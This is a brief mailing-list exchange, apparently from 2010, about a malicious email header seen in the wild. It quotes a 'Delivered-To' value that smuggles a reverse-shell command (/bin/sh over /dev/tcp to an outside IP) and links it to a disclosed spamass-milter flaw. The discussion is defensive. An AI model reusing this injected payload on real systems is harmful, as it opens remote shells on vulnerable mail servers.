On 18 March 2010 11:31, David Leadbeater <dgl(a)dgl.cx> wrote:
On Thu, Mar 18, 2010 at 07:47:03AM +0000, Alastair
Sherringham wrote:
[..]
Delivered-To: "root+:|exec /bin/sh
0</dev/tcp/92.243.5.144/9991 1>&0
That would be someone trying to exploit this absolute failure:
http://seclists.org/fulldisclosure/2010/Mar/140
Hmm. Thanks for that.
Luckily, I don't use spamass-milter but from I see, this vulnerability
is present in the current Debian code. I have not checked the source
though, just changelog (last entry last year). Scary stuff ...
--
Alastair Sherringham